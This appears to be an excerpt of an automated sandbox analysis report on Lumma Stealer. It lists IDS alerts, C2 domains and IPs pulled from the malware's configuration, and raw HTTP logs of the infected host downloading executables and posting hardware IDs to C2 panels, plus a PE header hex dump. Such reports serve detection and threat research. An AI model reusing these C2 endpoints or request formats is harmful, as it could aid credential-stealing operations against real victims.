Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50002 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50003 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50003 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50010 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50017 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50050 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50060 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49995 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50004 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50004 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50024 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50028 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50024 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50028 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50044 -> 104.21.53.8:443
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown Network traffic detected: DNS query count 38
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:08:14 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Thu, 24 Oct 2024 16:06:11 GMTConnection: keep-aliveETag: "671a7073-1c8c00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:08:19 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:08:22 GMTContent-Type: application/octet-streamContent-Length: 2863616Last-Modified: Thu, 24 Oct 2024 15:30:40 GMTConnection: keep-aliveETag: "671a6820-2bb200"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:08 GMTContent-Type: application/octet-streamContent-Length: 2949632Last-Modified: Thu, 24 Oct 2024 16:05:58 GMTConnection: keep-aliveETag: "671a7066-2d0200"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:18 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:27 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 24 Oct 2024 15:30:13 GMTConnection: keep-aliveETag: "671a6805-e0800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:35 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:49 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Thu, 24 Oct 2024 16:06:11 GMTConnection: keep-aliveETag: "671a7073-1c8c00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:56 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:58 GMTContent-Type: application/octet-streamContent-Length: 2863616Last-Modified: Thu, 24 Oct 2024 15:30:40 GMTConnection: keep-aliveETag: "671a6820-2bb200"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:10:00 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Thu, 24 Oct 2024 16:06:11 GMTConnection: keep-aliveETag: "671a7073-1c8c00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:10:03 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 d0 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 69 00 00 04 00 00 a1 56 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 65 74 7a 74 67 66 7a 00 70 19 00 00 50 4f 00 00 6a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 66 63 73 68 79 61 00 10 00 00 00 c0 68 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 68 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 2d 2d 0d 0a Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="build"doma------CFBAKKJDBKJJJKFHDAEB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001226001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001227001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="build"doma------IECBGIDAEHCGDGCBKEBG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001228001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAKFIJJKJJJKEBKJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 2d 2d 0d 0a Data Ascii: ------FHIDAKFIJJKJJJKEBKJEContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------FHIDAKFIJJKJJJKEBKJEContent-Disposition: form-data; name="build"doma------FHIDAKFIJJKJJJKEBKJE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001229001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="build"doma------HIDHDGDHJEGHIDGDHCGC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 2d 2d 0d 0a Data Ascii: ------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="build"doma------EBGDHJECFCFCAKFHCFID--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="build"doma------JJJEGHDAECBFHJKEGIJK--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
